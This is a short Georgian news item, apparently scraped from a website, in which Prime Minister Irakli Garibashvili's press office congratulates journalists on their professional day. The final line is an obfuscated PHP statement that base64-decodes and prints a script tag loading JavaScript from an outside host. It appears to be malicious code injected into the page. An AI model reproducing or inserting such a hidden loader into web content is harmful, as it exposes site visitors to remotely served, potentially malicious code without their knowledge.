celsiusi
ავერსი შნაიდერი
საქართველოს პრემიერ-მინისტრი ირაკლი ღარიბაშვილი ქართველ ჟურნალისტებს პროფესიულ დღეს ულოცავს. ამის შესახებ ინფორმაციას პრემიერის პრესამსახური ავრცელებს.
 
„მინდა, ქართული ჟურნალისტიკის დღე მივულოცო ჩვენს ჟურნალისტებს, მედიის წარმომადგენლებს. უდიდესი პასუხისმგებლობაა, პრინციპებისა და ღირებულებების ერთგულებით, მაღალი პროფესიული სტანდარტის დაცვით ემსახურო შენს ხალხსა და ქვეყანას.
 
ჩვენი ქვეყნის დემოკრატიისთვის კი აუცილებელი წინაპირობა დამოუკიდებელი და თავისუფალი, პლურალისტური მედიაგარემოს არსებობაა, რასაც ჩვენი გუნდი - „ქართული ოცნება“ უდგას გარანტად.
 
კიდევ ერთხელ ვულოცავ მთელს ჟურნალისტთა კორპუსს პროფესიულ დღეს და ვუსურვებ წარმატებებს მათ პროფესიულ საქმიანობაში“, - აღნიშნავს ირაკლი ღარიბაშვილი.
 
მილოცვის ტექსტს პრემიერის პრესსამსახური ავრცელებს. 
 
1350
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");